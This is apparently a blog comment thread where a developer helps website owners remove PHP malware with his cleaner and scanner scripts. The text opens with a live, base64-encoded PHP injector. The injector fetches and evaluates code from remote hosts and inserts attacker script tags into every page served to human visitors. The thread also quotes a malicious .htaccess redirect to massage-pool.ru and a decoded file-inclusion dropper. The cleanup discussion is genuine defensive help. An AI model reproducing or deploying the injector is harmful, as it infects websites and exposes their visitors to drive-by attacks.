eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc29ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYgKCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2NrLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZWFkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xvc2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVhbDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYpe0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNvZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBmdW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdGRvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJbJ3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKEBmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZiAoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb250ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1lbHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRjPUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aWYgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0yKV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNzc3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKCR1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25lIikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc19tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVhLCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdHJpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lFIDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2lmICghaXNfZGlyKCRyeikpe0Bta2RpcigkcnopO2lmIChpc19kaXIoJHJ6KSl7JG16PSRyejt9ZWxzZXskcno9JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdLiIvLmxvZ3MvIjtpZiAoIWlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoaXNfZGlyKCRyeikpeyRtej0kcno7fX1lbHNleyRtej0kcno7fX19ZWxzZXskbXo9JHJ6O30kYm90PTA7JHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZiAoc3RyaXN0cigkdWEsIm1zbmJvdCIpfHxzdHJpc3RyKCR1YSwiWWFob28iKSkkYm90PTE7aWYgKHN0cmlzdHIoJHVhLCJiaW5nYm90Iil8fHN0cmlzdHIoJHVhLCJnb29nbGUiKSkkYm90PTE7JG1zaWU9MDtpZiAoaXNfbXNpZV83NzcoJHVhKSkkbXNpZT0xOyRtYWM9MDtpZiAoaXNfbWFjXzc3NygkdWEpKSRtYWM9MTtpZiAoKCRtc2llPT0wKSYmKCRtYWM9PTApKSRib3Q9MTsgIGdsb2JhbCAkX1NFUlZFUjsgICAgJF9TRVJWRVJbJ3NfcDEnXT0kbXo7ICAkX1NFUlZFUlsnc19iMSddPSRib3Q7ICAkX1NFUlZFUlsnc190MSddPTEyMDA7ICAkX1NFUlZFUlsnc19kMSddPSJodHRwOi8vc3dlZXBzdGFrZXNhbmRjb250ZXN0c2RvLmNvbS8iOyAgJGQ9Jz9kPScudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX0hPU1QiXSkuIiZwPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJQSFBfU0VMRiJdKS4iJmE9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKTsgICRfU0VSVkVSWydzX2ExJ109J2h0dHA6Ly93d3cubGlseXBvcGhpbHlwb3AuY29tL2dfbG9hZC5waHAnLiRkOyAgJF9TRVJWRVJbJ3NfYTInXT0naHR0cDovL3d3dy5sb2x5cG9waG9seXBvcC5jb20vZ19sb2FkLnBocCcuJGQ7ICAkX1NFUlZFUlsnc19zY3JpcHQnXT0ibW0ucGhwP2Q9MSI7ICB9ICAgICAgc2V0dXBfZ2xvYmFsc183NzcoKTsgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ21sXzc3NycpKXsgIGZ1bmN0aW9uIGdtbF83NzcoKXsgICAgJHJfc3RyaW5nXzc3Nz0nJzsgIGlmICgkX1NFUlZFUlsnc19iMSddPT0wKSRyX3N0cmluZ183Nzc9JzxzY3JpcHQgc3JjPSInLmdldF9hY3R1YWxfdGRzXzc3NygpLiRfU0VSVkVSWydzX3NjcmlwdCddLiciPjwvc2NyaXB0Pic7ICByZXR1cm4gJHJfc3RyaW5nXzc3NzsgIH0gIH0gICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZWl0JykpeyAgZnVuY3Rpb24gZ3pkZWNvZGVpdCgkZGVjb2RlKXsgICR0PUBvcmQoQHN1YnN0cigkZGVjb2RlLDMsMSkpOyAgJHN0YXJ0PTEwOyAgJHY9MDsgIGlmKCR0JjQpeyAgJHN0cj1AdW5wYWNrKCd2JyxzdWJzdHIoJGRlY29kZSwxMCwyKSk7ICAkc3RyPSRzdHJbMV07ICAkc3RhcnQrPTIrJHN0cjsgIH0gIGlmKCR0JjgpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMTYpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMil7ICAkc3RhcnQrPTI7ICB9ICAkcmV0PUBnemluZmxhdGUoQHN1YnN0cigkZGVjb2RlLCRzdGFydCkpOyAgaWYoJHJldD09PUZBTFNFKXsgICRyZXQ9JGRlY29kZTsgIH0gIHJldHVybiAkcmV0OyAgfSAgfSAgZnVuY3Rpb24gbXJvYmgoJGNvbnRlbnQpeyAgQEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgJGRlY29kZWRfY29udGVudD1nemRlY29kZWl0KCRjb250ZW50KTsgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJGRlY29kZWRfY29udGVudCkpeyAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sXzc3NygpLiJcbiIuJyQxJywkZGVjb2RlZF9jb250ZW50KTsgIH1lbHNleyAgcmV0dXJuICRkZWNvZGVkX2NvbnRlbnQuZ21sXzc3NygpOyAgfSAgfSAgb2Jfc3RhcnQoJ21yb2JoJyk7ICB9ICB9"));Hello Cris,
Can you try to run my Malware Scanner:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Save the log and send it to me at info@php-beginners.com
including an 2 or 3 infected file. I’ll check the file and create a pattern of it.
Let me know. Thanks.
Paolo
Hi Paolo,
I installed the “cleaner-cli_2.4″ file into my root domain. What is the next step? It seems I should do more than just drop it in there. Please help.
All my .htaccess files for all my domains are full of “rewrites.” There seems to be a malicious script running somewhere. Every time I delete the “rewrite code” in these .htaccess files, they come back within an hour.
I’m hoping that the “cleaner-cli_2.4″ file can clean up the hidden code. I just need to understand how to properly use it.
Thanks!
Dan
Hello Dan,
Run it using shell terminal with this code:
I hope that helps. Just saw your site, you’ve been block because of the malware.
If the script didn’t removed the javascript malicious code let me know.
Paolo
What is shell terminal exactly?
It is a command-line user interface to the server. It is used to connect and perform task to the server
by typing commands. It is equivalent to DOS environment in Windows.
https://ccrma.stanford.edu/guides/planetccrma/terminal.html
Most hosting company provides shell access, if in case not, you may use Cleaner HTTP version.
Just simply upload the file to your server and run it using your browser. See the instructions
above.
Thanks let me know.
Paolo,
Should this script work for http:// bannortimqimulta.ru/industry/index .php ? I just installed the script in my root folder and scanned the site but they bad code is still in all of the .htaccess files.
Thanks!
hmmmmm… can I check your .htaccess file.
Can you send it to info@php-beginners.com
Bluehost gives me shell access to use with my favorite SSH Client. What SSH Client do you recommend, and where can I get it?
I only used PuTTY, it’s really good.
If you don’t have one, you can download it here:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Where is your donate link? Do you have a PayPal account? I really appreciate this script and would like to send you a thank you.
Wow… Thank you Happy Visitor.
I really appreciate it. I never thought about this one. Thanks for encouraging me to create a better Malware Cleaner program. Big big thanks again. 
Have a great day!
Paolo,
Concerning puTTY…
After connecting with my username and hostname, I’m then prompted to enter my password, but it will not allow me to type it in. It will not allow ANY characters to be typed. You ever had trouble with this? Maybe there’s a setting I’m missing.
Dan
Hello Dan, that is normal, don’t worry just enter your password correctly, and hit enter when your done.
Thanks, this solution was great!!
It would be even better if you would have the same solution for magento. I got malicious code on wordpress and magento at the same time, but magento seems to be a little more pain in the ass to resolve..
I am sorry but this works on Magento as well or any php program. Just run the cleaner script.
Sorry about that.
Please make sure you create a backup of your files before you run the cleaner script, so that you can easily recover
the files if something goes wrong. Let me know what I can help.
Paolo
Thanks Paolo, it worked perfectly on magento as well.
Now I found this code at the bottom of my wordpress website and I want to remove from all .php files, how do I do this?
Thanks
For some reason it didn’t show the proper code that I need to remove, which is:
I am so not technical, but I can’t afford help. My blogs are messed up. I’ve got the bizarre dashboard going on for all my blogs. I found your site and I am trying to run the script, but I may not have done it right. Here’s what I did:
I downloaded the file, extracted it, uploaded it to my http://www.melissathinks.com folder via ftp. Then I went to my browser (chrome) and typed http://www.melissathinks.com/cleaner_2.4.php. The little circle spun for a really long time and then I got a 505 error.
Did I so something wrong?
Oh and thank you soooooo much for creating this! I have spent so many hours trying to figure out what the hell happened and trying to fix it and I literally ended up crying
Oh! don’t worry Melissa, I’m here to help you. We’ll fix your blog.
Actually, you did it right. I’m not really sure why the page throws 500 Internal Server error, maybe it’s because of your hosting
php.ini configuration.
Can you try to run my malware scanner (download and upload it to your server same thing you did on cleaner_2.4.php):
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
and please send the scan result to info@php-beginners.com
you can also add me on skype: oo70vd
so that we can resolve your problem immediately.
Let me know.
Paolo
Paolo,
I was reading on my ipad and I decided to take one more look at my destroyed dashboard and guess what? It looked fine! So this morning I got up all excited and went to check it out on my laptop, still no good. I cleared cache, still no good. Used firefox, still no good.
You are right, it did work!!! I’m such a doofus. Last night before I went to sleep, way later than normal
So then I downloaded safari and it looked great!
I’m haven’t learned a lot of techy stuff, but I do love the scientific method. So I sat over breakfast wondering why apple products would be different and couldn’t come up with a reason other than they had NEVER accessed my dashboard before.
So I went under the hood in chrome and instead of just telling it to clear cache, I cleared everything, passwords and all. And guess what?????
My dashboard looks normal again!!! I did the same on firefox and it looks great there too. I don’t really give a crap about IE…I try never to use that browser
I wish I had found your blog so much earlier in the day yesterday, I would have saved so many tears
I’m heading over to your donate button now and I am going back to every forum that I went to yesterday to tell them about your amazing script!!!!
Thank you from the bottom of my heart.
Melissa
Thanks Melissa, that’s really nice to hear that your site is back normal again. You’re site looks great! Thank you also Melissa for the donation, big big thanks.
If you have problem of your site just let me know.
Thanks again.
Paolo
Hi Admin
Absolutely amazing code. Used that. Worked perfectly. Thank You so much. Please reply me on sagar@clubhack.com & chmag.in We will love to post your article on our magazine ClubHack Magazine.
Thank You Again.
Sagar Nangare
ClubHack
Pingback: Hacked Off | Inner Quests
Thanks for your help. We have downloaded cleaner_2.4 file and executed via browser from root folder ,which removed all the virus script. I have edited some thing on that code to change file execute permission.just added this code chmod($dir.”/”.$file,0444);
Awesome! thanks for letting me know.
Hey guys,
Maybe I need to add this code too… chmod($dir.”/”.$file,0444);
When I’m running the cleaner_2.4 file, my page doesn’t come up. You can try it here… http://www.dbdrumtips.com/cleaner_2.4.php
Where exactly in the cleaner_2.4.php file do I need to place chmod($dir.”/”.$file,0444);
Thanks!
Dan
Hi Dan,
I’m not really sure about that. I have checked your site, but I cannot continue it says: Reported Attack Page! http://www.dbdrumtips.com contains malware. Your computer might catch a virus if you visit this site.
You can try ignoring the warning but instead continue opening the page, try it again:
http://www.dbdrumtips.com/cleaner_2.4.php
Or, you can use the CLI version, if you have shell access.
Let me know what I can help.
Paolo
Paolo,
I can proceed to the root domain with no trouble. It’s just that when I try to proceed with http://www.dbdrumtips.com/cleaner_2.4.php is when it just will not open. I just get, “Website Offline, No Cached Version Available.”
I tried the CLI version, but puTTY would not let me type in my password.
What do you advise?
Thanks!
Dan
hmm.. Just continue entering the password, and hit enter when it’s done. That’s normal to PuTTY.
Let me know.
Paolo
Paolo,
I can proceed to dbdrumtips.com with no difficulty. It’s when I proceed to to dbdrumtips.com/cleaner_2.4.php is when I have trouble. I get “Website Offline, No Cached Version Available.”
I tried the CLI version, but puTTY would not let me type in my password. It just seems to freeze.
Your cleaning tools would be a dream come true if I could just get them to work for me. Can you advise me further? I appreciate your help!
Dan
Can you add me up, on your skype: oo70vd
I’ll help you.
Paolo
If I upload the cleaner into a specific directory (not the root) will it just clean the files in that directory?
I wanted to test it before applying to the whole site.
I have an infected Joomla site. I am assuming it will work for this.
Thanks
Yes that’s right, it will just clean all the files in that director.. It works well on Joomla too. Make sure you backup your files before you run the script.
Just to make sure.
Let me know.
hello, my site was wordpres with this problem, I backed up and everything, fixed the problem of the virus, but now the enrtar the site is by IE misaligned left, since I updated wordpress, the thema, and put some files up as css, and to no avail, please help me. in other browsers like chrome, firefox works normally, the lightbox it also only works in IE as in others not
http://www.clubdofitness.com.br
Hello Rodrigo,
I have checked your site, you have a great site, they really look great on FF 10.0.2 and chrome 17.0.963.56 m but on IE 8 it’s not.
Don’t worry will fix that asap. Keep you posted.
Paolo
Hi Rodrigo,
Wow, this is really difficult to locate this type of error.
Actually, this is my first time.
http://www.php-beginners.com/images/2012-03-02_2201.png
I think the file is:
/wp-content/themes/fitness/header.php
Just modify the file. The <!DOCTYPE html> looks like a normal less than (<) symbol but the (<) is not. That’s why you have to replace it by typing less than (<).
Let me know, maybe I’m wrong, but it works fine on my browser.
Regards,
Paolo
I LOVE YOU! Thanks for sharing this with the world. It has saved me tons of time
I’m going straight to the “Donate” button, you deserve it!!
Will you consider keeping the cleaner updated?
)
Big big Thanks Victoria, I received your donation already. Thanks again.
Yes, I will keep this updated.
Thank you again Victoria. Have a great day!
Paolo
Paolo,
I’ve added you on Skype, and sent you a message.
Dan
This was the code that was in all of my .php files
Unfortunately, I started manually removing it in Dreamweaver, before I found your cleaner…I just ran it and I’m hoping it worked! I have to wait for my site to go back online ( I took it down, so the malware wouldn’t mess with anyone else’s system)
Thanks so much!
~Rena~
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6c..."));Hi Rena,
Cleaner script can totally removed that malware code.
This malware codes redirects your visitors to another site (costabrava.bee.pl)
Hoped it removed already. Let me know.
Thanks,
Paolo
Hey Paolo!
Then I’m going to change all my log-ins, etc.
It just did it again…almost a month later (worst.day.ever.)…I’m gonna run the scanner again! It worked last time
Thank You…Again, hehe,
~Rena~
That’s really bad. Please send the scan result I’ll check it out.
Paolo
Excellent weblog here! Additionally your site quite a bit up very fast! What host are you the usage of? Can I get your affiliate link on your host? I desire my web site loaded up as fast as yours lol
hello sir..
i did scan using cleaner_2.4.php and it show 0 Found Infected Files..
however when i scan my website using sucuri.net it show Site infected with malware.
and how to use Cleaner CLI 2.4 with command prompt..
did i need to open cmd.exe and insert the code that you gave above or i extract the zip file and open with the cmd and insert the code?
thank you in advance.
I see, when I click your site from google search result
it redirects me to the hacker’s web page – (Do not visit the site: massage-pool.ru/mysave/index.php). This leads to losing visitors to your site and bad effect your SEO works. We need to stop this attack asap.
Is it okay if you’ll send to me your .htaccess and index.php files to info@php-beginners.com? I will check it and see what I can do to remove it.
Thanks. Let me know.
Paolo
i already send you the htaccess and index.php file..please check your email from goodigi2011@gmail.com
thank you again.
Hello Haris,
I got your email. Your “.htaccess” file is infected, you have to delete the code from line 1-16.
The malicious code that was inserted in your “.htaccess” redirects your visitors to hackers site (massage-pool.ru)
Below is the malicious code. You have to delete these line of codes.
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L] </IfModule>Let me know.
Paolo
thank you for your reply..
i did already delete all that before..but it appear again after an hour….doesn’t matter what i do..it will appear again at htaccess….
Hello Paolo,
I’m having the exact same situation. The site is redirecting to the same massage-pool. I’m deleting the lines from the .htaccess file but like haris, they come back after an hour or so.
I have only run the cleaner via the website option. When I run the cleaner via the CLI it says “could not open input file.”
Anything you can do would be great. We’re going on 24 hours of infection and I can’t get it out.
Take care,
- Mark
Hi Mark and Haris,
We need to figure out where and what file is writing back the malware code again.
Here’s what we are going to do. Can you run a malware scan on your site. Just download and run the file (see link below) and send the scan result to info@php-beginners.com
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Let me know. Thanks.
Paolo
This script is working very well. Thank you Paolo you saved me.
That’s nice to hear. You’re welcome.
can we run this script from a web browser?
Yes, use the HTTP cleaner version.
Pingback: Tired of hackers « MichaelKerley.net
I ran the browser version on a couple of sites a few days ago and it worked great!
Unfortunately, I ran into time-out problems on my main site, so today I tried running from terminal ssh. After a while I was worried it wasn’t working, so I aborted . . . and when I checked the cleaner_log all I see is a list of folders (not the list of files I got when I ran the browser version). And they were folders in the NEW WP install I thought was clean! . . . it never got to the .old and .HACKED folders where I know there are problems.
Is this just a list of what it checked (rather than what it fixed)?
If I let it run will I get a list of what it fixed?
or is there a way to run it on specific subfolders?
Thanks for your great work!
Hello Dewluca,
CLI version is more faster than Browser version of cleaner, that’s the difference. The list of directories that was in cleaner_log are directories that were visited/checked by the cleaner script. If the cleaner saw a malware / malicious script in a certain file it will list that file on clear_log.
You can run the cleaner on a certain directory, just by placing the cleaner file on that directory, example, /www/php-beginners.com/wp-content/cleaner_2.4.php, it will scan all the files inside /www/php-beginners.com/wp-content/ directory and then clean those files that has malware/malicious codes.
Thanks for using cleaner script. Just Let me know if you still have problems. Thanks.
Paolo
Is this script specific to wordpress? I have a bunch of concrete5 sites and a zen cart site that has been infected by the same hack.
Hello Alex,
This is works well on all php programs. WordPress, Joomla, Magento, and etc…
But don’t forget to backup your files first before running the cleaner.
Let me know how it goes. Thanks.
Paolo
I’m so happy I found this. I am having the same issue (WordPress!) I could not get the cleaner script to run in my browser (kept getting a 500 error), but I dusted off my DOS skills and ran in PuTTY. Now I have a log, but I have no idea what it means…it looks like all the files it cleaned were in an old WP folder that shouldn’t be accessed by more current site. Any thoughts?
Hi Kelly,
I’m glad that you’re happy you found this site.
When you run the cleaner script any malicious and malware script
is immediately deleted.
Can you send to me the cleaner_log at info@php-beginners.com.
Also, please run http://www.php-beginners.com/wordpress-hack-malware-scanner.html
it will help us find potential malware or malicious script on your site. Please send
the scan result as well.
Let me know. Thanks.
Cheers,
Paolo
Awesome. I did get it to work on one domain, and noticed it’s on some others. I am working on cleaning everything, and I will send you the logs. THANK YOU!
Hello Kelly,
Sure not a problem, just let me know if you need help. Thanks.
Paolo
Heya i am for the primary time here. I came across this board and I to find It truly useful & it helped me out a lot. I’m hoping to provide something again and aid others like you aided me.
Hey Paulo,
So glad I found your site. One of our WordPress sites got hacked just over a week ago, it was redirecting to another site. I noticed that the file on our server had been modified and inserted with some base64 code, so I went through and replaced all the files with ones from my last back up. We also changed all passwords etc but were still getting the problem.
Anyway I ran your cleaner script and it found a load of files I’d missed and thankfully its all fixed now, thank you so much. I’ve now gone back and made sure our WordPress and Plugins are now fully up-to-date and that we have strong passwords.
thanks again
Hello Mark, Awesome, thanks. I’m glad that it worked well for you. Please do create a backup of your clean files.
Have a great day!
Paolo
Hi…
mine as well got infected, try to find the culprit with decrypting the gzinflate, and lastly got this code
if(function_exists(‘ob_start’)&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']=’/home/path/to/mydomain/cp/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/ec5.php’;if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists(‘gml’)&&function_exists(‘dgobh’)){ob_start(‘dgobh’);}}}
Do you guys know, what this code intent to?
Hello Dobol,
That malware simple calls another file to execute.
/home/path/to/mydomain/cp/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/ec5.php
I think you have tinymce vulnerability issue. hmmm.. but I’m not really sure yet.
Can you send me the infected file (where the eval(gzinflate(…)) code is in) and ../inlinepopups/skins/clearlooks2/img/ec5.php
I’ll check them, and see what I can do.
Thanks.
Paolo
Hi Paolo..
Thanks for your response,
Here is the links to the files
http://www.mediafire.com/download.php?c2k1xj425oqcjo3
both ec5.php,the decrypted of ec5.php and infected file.
Hello Dobol,
These are dangerous files, you have to delete it immediately.
They’re all malicious files.
Can you run also my malware scanner script. So, we can find the
other malicious files in your server. See the link below:
